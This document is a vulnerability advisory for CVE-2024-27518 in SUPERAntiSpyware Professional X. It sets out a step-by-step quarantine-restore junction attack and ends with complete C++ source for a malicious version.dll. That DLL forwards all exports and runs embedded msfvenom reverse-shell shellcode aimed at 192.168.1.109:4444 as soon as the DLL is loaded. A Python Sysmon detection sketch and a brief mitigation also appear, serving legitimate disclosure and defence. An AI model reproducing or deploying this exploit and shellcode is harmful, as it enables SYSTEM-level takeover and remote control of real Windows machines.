SUPERAntiSpyware Professional X 10.0.1264 DLL Hijacking / Privilege Escalation

Published: 03 Apr 2024
Reported by: M. Akil Gundogan
Source: packetstorm (packetstormsecurity.com)

SUPERAntiSpyware Professional X 10.0.1264 DLL Hijacking / Privilege Escalation vulnerability in version.dll allows local privilege escalation on Windows 10 x6

Related

- CNNVD: SUPERAntiSpyware Professional X Security Vulnerability (29 Apr 2024)
- CVE: CVE-2024-27518 (29 Apr 2024)
- Cvelist: CVE-2024-27518 (29 Apr 2024)
- GithubExploit: Exploit for CVE-2024-27518 (3 Apr 2024)
- NVD: CVE-2024-27518 (29 Apr 2024)
- Positive Technologies: PT-2024-21928 · Unknown · Superantispyware Professional (29 Apr 2024)
- RedhatCVE: CVE-2024-27518 (23 May 2025)
- Vulnrichment: CVE-2024-27518 (29 Apr 2024)
# Title: SUPERAntiSpyware Professional X Version <=10.0.1264 "version.dll" Local Privilege Escalation
# Date: 03.04.2024
# Author: M. Akil Gündoğan
# Vendor Homepage: https://superantispyware.com/
# Version: 10.0.1262 and latest version 10.0.1264
# Tested on: Windows 10 Professional x64
# PoC Video: https://youtu.be/FM5XlZPdvdo
# CVE ID: CVE-2024-27518

# Vulnerability Description:
--------------------------------------
SUPERAntiSpyware Professional X 10.0.1262 and 10.0.1264 are vulnerable to local privilege escalation because an unprivileged user can restore a malicious DLL from quarantine into the "C:\Program Files\SUPERAntiSpyware" folder via an NTFS directory junction, as demonstrated with a crafted version.dll that is detected as malware. Since SASCore64.exe is vulnerable to DLL hijacking through "version.dll", a shell is obtained as NT AUTHORITY\SYSTEM after the system reboots.

Technical details and step-by-step proof of concept (PoC):

1 - A malicious version.dll containing shellcode is created.

2 - If the generated "version.dll" containing the shellcode is not already detected by SUPERAntiSpyware, it is concatenated with another malicious file (a ".zip") using the command "copy /b version_created.dll + malicious.zip version.dll" so that the result is detected as malicious. In this way the created ".dll" is detected as malicious by SUPERAntiSpyware and quarantined.

3 - Create a new folder and copy the prepared "version.dll" into it. Then scan the folder so that SUPERAntiSpyware quarantines the DLL.

4 - Using "CreateMountPoint.exe" from the "Symbolic Link Testing" tools provided by Google (https://github.com/googleprojectzero/symboliclink-testing-tools), mount the path where "version.dll" is quarantined onto the "C:\Program Files\SUPERAntiSpyware" directory. The mklink command can be used to do the same thing.

5 - When the quarantined "version.dll" is restored, it is copied into SUPERAntiSpyware's directory. After the system reboots, SASCore64.exe executes the shellcode in "version.dll" and opens a session with NT AUTHORITY\SYSTEM privileges for the attacker.
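The chain above leaves two observable traces on the host: a file named like a system DLL appearing in the application directory (the restore through the junction), and a SYSTEM process then loading that DLL from the application directory instead of System32. As an added defender-side example, not part of the advisory or of the vendor's software, the following Python sketch applies both observations as a rule over Sysmon-style ImageLoaded (Event ID 7) and FileCreate (Event ID 11) records. The records are constructed and flattened to JSON lines with simplified field names, the watched-DLL set and trusted-directory list are assumptions to tune locally, and SUPERAntiSpyware.exe is an assumed name for the restoring process (SASCore64.exe is the loader named in the advisory).

```python
"""Added detection sketch for the version.dll hijack chain in the advisory:
(1) a file named like a system DLL is written into an application directory
(the quarantine restore through the junction), then (2) a SYSTEM process loads
that DLL from the application directory instead of System32.
All sample records below are constructed, not real telemetry."""
import json
from pathlib import PureWindowsPath

# DLL names the rule watches. version.dll is the one abused here; extending the
# set to other system DLLs is a local tuning decision (assumption).
WATCHED_DLLS = {"version.dll"}

# Directories from which a watched DLL is expected to be loaded (assumption).
TRUSTED_DIRS = [PureWindowsPath(r"C:\Windows\System32"),
                PureWindowsPath(r"C:\Windows\SysWOW64")]


def in_trusted_dir(path: str) -> bool:
    """True if `path` lives under one of TRUSTED_DIRS (case-insensitive compare)."""
    parents = PureWindowsPath(path).parents
    return any(trusted in parents for trusted in TRUSTED_DIRS)


def classify(event: dict):
    """Return a reason string if the record matches the hijack chain, else None."""
    def dll_name(path: str) -> str:
        return PureWindowsPath(path).name.lower()

    if event.get("EventID") == 11:                       # FileCreate
        target = event.get("TargetFilename", "")
        if dll_name(target) in WATCHED_DLLS and not in_trusted_dir(target):
            return "system DLL name written into an application directory"
        return None
    if event.get("EventID") == 7:                        # ImageLoaded
        loaded = event.get("ImageLoaded", "")
        if dll_name(loaded) not in WATCHED_DLLS or in_trusted_dir(loaded):
            return None
        reasons = ["system DLL loaded from outside System32"]
        signed = str(event.get("Signed", "")).lower() == "true"
        if not signed or event.get("SignatureStatus") != "Valid":
            reasons.append("unsigned or invalid signature")
        if event.get("User", "").upper().endswith("SYSTEM"):
            reasons.append("loaded into a SYSTEM process")
        return "; ".join(reasons)
    return None


def scan(lines):
    """Run classify() over JSON lines; return (EventID, Image, reason) findings."""
    findings = []
    for line in lines:
        event = json.loads(line)
        reason = classify(event)
        if reason:
            findings.append((event["EventID"], event.get("Image", ""), reason))
    return findings


# Constructed sample records. Event 1 is the normal load from System32,
# events 2 and 3 are the two observable steps of the chain, event 4 is noise.
APP_DIR = r"C:\Program Files\SUPERAntiSpyware"
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": APP_DIR + r"\SASCore64.exe", "User": r"NT AUTHORITY\SYSTEM",
     "ImageLoaded": r"C:\Windows\System32\version.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 11, "Image": APP_DIR + r"\SUPERAntiSpyware.exe",   # assumed process name
     "User": r"DESKTOP\lowpriv", "TargetFilename": APP_DIR + r"\version.dll"},
    {"EventID": 7, "Image": APP_DIR + r"\SASCore64.exe", "User": r"NT AUTHORITY\SYSTEM",
     "ImageLoaded": APP_DIR + r"\version.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "Image": APP_DIR + r"\SASCore64.exe", "User": r"NT AUTHORITY\SYSTEM",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(finding)
```

Run stand-alone, the script reports the FileCreate of version.dll in the application directory and the subsequent unsigned load into the SYSTEM process, and stays silent on the two legitimate System32 loads. The junction itself is not visible in these records; checking the quarantine and program directories for reparse points is a separate control.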
  
# Mitigations:
--------------------------------------
We recommend uninstalling SUPERAntiSpyware until the vulnerability is fixed.

# Timeline:
--------------------------------------
- 18.02.2024 - Vulnerability reported via email but vendor refused to fix it.
- 03.04.2024 - Full disclosure.

# References
--------------------------------------
- Vendor: https://www.superantispyware.com/
- CVE: https://www.cve.org/CVERecord?id=CVE-2024-27518
- Repository: https://github.com/secunnix/CVE-2024-27518/

# DLLMain:
-------------------------------------------------------------------------------------------------------------------------

```cpp
/* SUPERAntiSpyware LPE "version.dll" DLLMain.cpp
M. Akil GUNDOGAN (0xr3act0r) - Secunnix Vulnerability Research Team
Special Thanks: Safa Karakus and Samet Gozet

If the generated "version.dll" containing the shellcode is not already detected by SUPERAntiSpyware,
it is concatenated with another malicious file (a ".zip") using the command "copy /b version_created.dll + malicious.zip version.dll"
so that it is detected as malicious. In this way the created ".dll" is detected as malicious by SUPERAntiSpyware and quarantined.

Compile as release x64 DLL.
*/

#include <windows.h>
#include <cstring>    // std::memcpy
#include <iostream>

// Forward every export of the real version.dll to the copy in System32, so the
// host process keeps working after it loads this proxy DLL instead.
#pragma comment(linker,"/export:GetFileVersionInfoA=c:\\windows\\system32\\version.GetFileVersionInfoA,@1")
#pragma comment(linker,"/export:GetFileVersionInfoByHandle=c:\\windows\\system32\\version.GetFileVersionInfoByHandle,@2")
#pragma comment(linker,"/export:GetFileVersionInfoExA=c:\\windows\\system32\\version.GetFileVersionInfoExA,@3")
#pragma comment(linker,"/export:GetFileVersionInfoExW=c:\\windows\\system32\\version.GetFileVersionInfoExW,@4")
#pragma comment(linker,"/export:GetFileVersionInfoSizeA=c:\\windows\\system32\\version.GetFileVersionInfoSizeA,@5")
#pragma comment(linker,"/export:GetFileVersionInfoSizeExA=c:\\windows\\system32\\version.GetFileVersionInfoSizeExA,@6")
#pragma comment(linker,"/export:GetFileVersionInfoSizeExW=c:\\windows\\system32\\version.GetFileVersionInfoSizeExW,@7")
#pragma comment(linker,"/export:GetFileVersionInfoSizeW=c:\\windows\\system32\\version.GetFileVersionInfoSizeW,@8")
#pragma comment(linker,"/export:GetFileVersionInfoW=c:\\windows\\system32\\version.GetFileVersionInfoW,@9")
#pragma comment(linker,"/export:VerFindFileA=c:\\windows\\system32\\version.VerFindFileA,@10")
#pragma comment(linker,"/export:VerFindFileW=c:\\windows\\system32\\version.VerFindFileW,@11")
#pragma comment(linker,"/export:VerInstallFileA=c:\\windows\\system32\\version.VerInstallFileA,@12")
#pragma comment(linker,"/export:VerInstallFileW=c:\\windows\\system32\\version.VerInstallFileW,@13")
#pragma comment(linker,"/export:VerLanguageNameA=c:\\windows\\system32\\version.VerLanguageNameA,@14")
#pragma comment(linker,"/export:VerLanguageNameW=c:\\windows\\system32\\version.VerLanguageNameW,@15")
#pragma comment(linker,"/export:VerQueryValueA=c:\\windows\\system32\\version.VerQueryValueA,@16")
#pragma comment(linker,"/export:VerQueryValueW=c:\\windows\\system32\\version.VerQueryValueW,@17")

// Shellcode: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.109 LPORT=4444 -f c
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00"
"\x00\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x01\x6d"
"\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29"
"\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48"
"\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea"
"\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81"
"\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00"
"\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0"
"\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01"
"\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41"
"\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d"
"\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48"
"\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5"
"\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";


VOID shellcodeExecute() {
    ShowWindow(GetConsoleWindow(), SW_HIDE);

    // Back an RWX mapping with the page file, copy the payload in and call it.
    HANDLE mem_handle = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, sizeof(shellcode), NULL);

    void* mem_map = MapViewOfFile(mem_handle, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0x0, 0x0, sizeof(shellcode));

    std::memcpy(mem_map, shellcode, sizeof(shellcode));

    std::cout << ((int(*)())mem_map)() << std::endl;
}

// The payload runs as soon as the host process (SASCore64.exe) maps the DLL.
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        shellcodeExecute();
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```
